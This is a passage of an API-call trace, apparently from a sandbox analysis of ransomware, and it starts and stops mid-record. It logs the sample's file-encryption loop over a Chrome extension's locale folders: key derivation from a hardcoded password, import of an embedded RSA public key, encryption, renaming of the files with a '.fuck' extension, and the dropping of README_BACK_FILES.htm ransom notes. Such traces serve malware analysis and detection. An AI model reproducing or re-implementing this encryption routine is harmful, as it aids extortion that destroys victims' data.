KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.100] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.100] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298d6f8) returned 1 [0253.100] CryptImportPublicKeyInfo (in: hCryptProv=0x298d6f8, dwCertEncodingType=0x1, pInfo=0x2995420*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2995450*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2995458*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29854e0) returned 1 [0253.101] CryptEncrypt (in: hKey=0x29854e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.101] CryptEncrypt (in: hKey=0x29854e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298dbc0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298dbc0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.101] WriteFile (in: hFile=0x5d60, lpBuffer=0x298dbc0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298dbc0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.102] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe5, lpOverlapped=0x0) returned 1 [0253.103] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0253.103] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0253.103] CloseHandle (hObject=0x5d5c) returned 1 [0253.103] CloseHandle (hObject=0x5d60) returned 1 [0253.104] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json"), bFailIfExists=0) returned 1 [0253.108] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json", dwFileAttributes=0x0) returned 1 [0253.108] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.gsg")) returned 1 [0253.109] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.fuck")) returned 1 [0253.111] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.111] CryptDestroyKey (hKey=0x2984be0) returned 1 [0253.111] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.111] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.111] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.111] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\readme_back_files.htm")) returned 0xffffffff [0253.111] AreFileApisANSI () returned 1 [0253.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.111] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.112] GetFileType (hFile=0x5d50) returned 0x1 [0253.112] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.113] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.114] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.114] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.114] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.114] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.114] GetLastError () returned 0x0 [0253.114] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json")) returned 0x20 [0253.115] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json", dwFileAttributes=0x80) returned 1 [0253.116] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.117] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.118] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.118] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.121] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.121] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.121] CryptHashData (hHash=0x29846a0, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.121] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984be0) returned 1 [0253.121] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.121] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.122] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298dcd0) returned 1 [0253.122] CryptImportPublicKeyInfo (in: hCryptProv=0x298dcd0, dwCertEncodingType=0x1, pInfo=0x2994da0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2994dd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2994dd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29852a0) returned 1 [0253.122] CryptEncrypt (in: hKey=0x29852a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.122] CryptEncrypt (in: hKey=0x29852a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298dd58*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298dd58*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.122] WriteFile (in: hFile=0x5d5c, lpBuffer=0x298dd58*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298dd58*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.123] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe5, lpOverlapped=0x0) returned 1 [0253.125] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0253.125] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0253.125] CloseHandle (hObject=0x5d60) returned 1 [0253.125] CloseHandle (hObject=0x5d5c) returned 1 [0253.125] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json"), bFailIfExists=0) returned 1 [0253.129] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json", dwFileAttributes=0x0) returned 1 [0253.129] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.gsg")) returned 1 [0253.130] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.fuck")) returned 1 [0253.131] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.131] CryptDestroyKey (hKey=0x2984be0) returned 1 [0253.131] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.131] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.132] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.132] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\readme_back_files.htm")) returned 0xffffffff [0253.132] AreFileApisANSI () returned 1 [0253.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0253.132] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.133] GetFileType (hFile=0x5d50) returned 0x1 [0253.133] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.134] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.134] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.134] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.135] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.135] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.135] GetLastError () returned 0x0 [0253.135] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json")) returned 0x20 [0253.136] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json", dwFileAttributes=0x80) returned 1 [0253.136] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.137] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.137] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.138] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.140] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.140] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.140] CryptHashData (hHash=0x29846a0, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.140] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.140] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.140] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.140] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298dde0) returned 1 [0253.141] CryptImportPublicKeyInfo (in: hCryptProv=0x298dde0, dwCertEncodingType=0x1, pInfo=0x2994cd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2994d00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2994d08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29855a0) returned 1 [0253.141] CryptEncrypt (in: hKey=0x29855a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.141] CryptEncrypt (in: hKey=0x29855a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298de68*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298de68*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.141] WriteFile (in: hFile=0x5d60, lpBuffer=0x298de68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298de68*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.142] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe2, lpOverlapped=0x0) returned 1 [0253.143] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe2, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0253.143] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0253.144] CloseHandle (hObject=0x5d5c) returned 1 [0253.144] CloseHandle (hObject=0x5d60) returned 1 [0253.144] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json"), bFailIfExists=0) returned 1 [0253.147] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 